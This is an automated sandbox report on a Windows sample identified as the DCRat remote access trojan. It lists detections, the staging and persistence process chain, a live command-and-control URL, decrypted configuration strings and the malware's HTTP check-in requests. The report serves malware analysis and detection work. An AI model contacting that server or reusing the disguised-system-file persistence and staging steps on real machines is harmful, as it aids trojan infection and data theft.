
Windows Analysis Report
onlysteal.exe

Overview

General Information

Sample name: onlysteal.exe
Analysis ID: 1583653
MD5: 8f81ac89b9f6dbccf07a86af59faa6ba
SHA1: 0d97a27bacaae103f2f15637f623d3d13a568d91
SHA256: 766b497466955f86e0d049c25aa6f99880d230acbb8d1141408fe0e8169fb46a
Tags: DCRat, exe, malware, rat, trojan, user-Joker

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Drops PE files with benign system names
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Program Location with Network Connections
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • onlysteal.exe (PID: 716 cmdline: "C:\Users\user\Desktop\onlysteal.exe" MD5: 8F81AC89B9F6DBCCF07A86AF59FAA6BA)
    • wscript.exe (PID: 6284 cmdline: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5880 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hyperBlockCrtCommon.exe (PID: 2016 cmdline: "C:\Intorefnet/hyperBlockCrtCommon.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
          • cmd.exe (PID: 2420 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 2268 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5952 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • SgrmBroker.exe (PID: 7160 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
              • cmd.exe (PID: 5656 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • chcp.com (PID: 3300 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • w32tm.exe (PID: 4156 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                • SgrmBroker.exe (PID: 1488 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
                  • cmd.exe (PID: 4236 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • chcp.com (PID: 6368 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                    • PING.EXE (PID: 4888 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                    • SgrmBroker.exe (PID: 1864 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
                      • cmd.exe (PID: 3220 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • chcp.com (PID: 6256 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                        • w32tm.exe (PID: 796 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                        • SgrmBroker.exe (PID: 5372 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
  • cleanup

Malware Configuration

{"C2 url": "http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal"}

Source | Rule | Description | Author | Strings
onlysteal.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Intorefnet\hyperBlockCrtCommon.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Intorefnet\hyperBlockCrtCommon.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\ProgramData\smss.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: onlysteal.exe PID: 716 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.onlysteal.exe.699b6de.1.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0.3.onlysteal.exe.609c6de.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0.3.onlysteal.exe.609c6de.0.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
5.0.hyperBlockCrtCommon.exe.c80000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0.3.onlysteal.exe.699b6de.1.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" , CommandLine: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2420, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" , ProcessId: 7160, ProcessName: SgrmBroker.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Intorefnet\hyperBlockCrtCommon.exe, ProcessId: 2016, TargetFilename: C:\Users\All Users\smss.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 185.216.71.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Initiated: true, ProcessId: 7160, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49746
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\onlysteal.exe", ParentImage: C:\Users\user\Desktop\onlysteal.exe, ParentProcessId: 716, ParentProcessName: onlysteal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" , ProcessId: 6284, ProcessName: wscript.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-03T09:10:33.122779+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49746 | 185.216.71.25 | 80 | TCP
2025-01-03T09:11:00.557774+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49377 | 185.216.71.25 | 80 | TCP
2025-01-03T09:11:59.621339+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49431 | 185.216.71.25 | 80 | TCP


AV Detection

Source: onlysteal.exe | Avira: detected
Source: C:\Users\user\Desktop\BUHwkZnR.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\DYEovgjB.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\wYGfctxY.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\kzbsFheO.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\ProgramData\smss.exe | Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\FPzqkKvM.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\RpedHXOW.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\zVMHRGyj.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\plugneHL.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\AchrHOgY.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\vmGXvtnF.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: 0.3.onlysteal.exe.699b6de.1.unpack | Malware Configuration Extractor: DCRat {"C2 url": "http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal"}
Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | ReversingLabs: Detection: 83%
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exe | ReversingLabs: Detection: 83%
Source: C:\ProgramData\smss.exe | ReversingLabs: Detection: 83%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | ReversingLabs: Detection: 83%
Source: C:\Users\Default\Saved Games\IadHSrMxJwYAMPkyRTLDEKgeW.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\AchrHOgY.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\BUHwkZnR.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\DYEovgjB.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\FPzqkKvM.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\RpedHXOW.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kzbsFheO.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\plugneHL.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\vmGXvtnF.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\wYGfctxY.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\zVMHRGyj.log | ReversingLabs: Detection: 50%
Source: onlysteal.exe | ReversingLabs: Detection: 71%
Source: onlysteal.exe | Virustotal: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.7% probability
Source: C:\Users\user\Desktop\BUHwkZnR.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DYEovgjB.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\kzbsFheO.log | Joe Sandbox ML: detected
Source: C:\ProgramData\smss.exe | Joe Sandbox ML: detected
Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AchrHOgY.log | Joe Sandbox ML: detected
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Joe Sandbox ML: detected
Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\vmGXvtnF.log | Joe Sandbox ML: detected
Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | Joe Sandbox ML: detected
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Joe Sandbox ML: detected
Source: onlysteal.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: ["XHesibifFlNX29Z91mtItKpO8cNKNjMr11py2gGhWQvddl4J8rUY9gOMcPuFNXRfYggATkHUfMvdYMuXiEMgOyrUndWmwBT88QE7F4zYkA3xuvxPeWhJLvRjyLX0Nehd","ebfe70ca8abacc37de1b3f373e3a32ec899572a7484d84d302662c41dc4d8e50","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp | String decryptor: [["http://185.216.71.25/","PollgeoprocessorprotectbasewordpresswpLocal"]]
Source: onlysteal.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: onlysteal.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: onlysteal.exe
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdll source: SgrmBroker.exe, 0000001B.00000002.3343374036.000000000105A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0023A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0024C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0025B348 FindFirstFileExA
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File opened: C:\Users\user\AppData
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File opened: C:\Users\user
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Code function: 4x nop then jmp 00007FFD3488C906h | 5_2_00007FFD3488C6ED
Source: C:\Intorefnet\hyperBlockCrtCommon.exe | Code function: 4x nop then jmp 00007FFD34A64AA8h | 5_2_00007FFD34A64540
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 4x nop then jmp 00007FFD348AC906h | 11_2_00007FFD348AC6ED
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 4x nop then jmp 00007FFD348CC906h | 17_2_00007FFD348CC6ED
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 4x nop then jmp 00007FFD3489C906h | 22_2_00007FFD3489C6ED
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | Code function: 4x nop then jmp 00007FFD3489C906h | 27_2_00007FFD3489C6ED

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49746 -> 185.216.71.25:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49377 -> 185.216.71.25:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49431 -> 185.216.71.25:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: global traffic | TCP traffic: 192.168.2.6:49369 -> 162.159.36.2:53
Source: Joe Sandbox View | ASN Name: CLOUDCOMPUTINGDE CLOUDCOMPUTINGDE
Source: global traffic | HTTP traffic detected:
    POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
    Host: 185.216.71.25
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 185.216.71.25
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
    Host: 185.216.71.25
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 185.216.71.25
    Content-Length: 336
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | TCP traffic detected without corresponding DNS query: 185.216.71.25
Source: unknown | HTTP traffic detected:
    POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
    Host: 185.216.71.25
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.216.71.25
Source: SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.216.71.25/
Source: SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal.php
Source: SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.216.71.25puW
Source: hyperBlockCrtCommon.exe, 00000005.00000002.2165352874.0000000003390000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, s67.cs | Long String: Length: 97628
Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, s67.cs | Long String: Length: 97628
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_00236FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0023848E
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002400B7
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_00244088
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002340FE
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_00247153
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002551C9
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002332F7
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002462CA
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002443BF
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0023C426
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0023F461
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0025D440
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002477EF
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0023286B
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0025D8EE
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_0023E9B7
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_002619F4
Source: C:\Users\user\Desktop\onlysteal.exe | Code function: 0_2_00246CDC
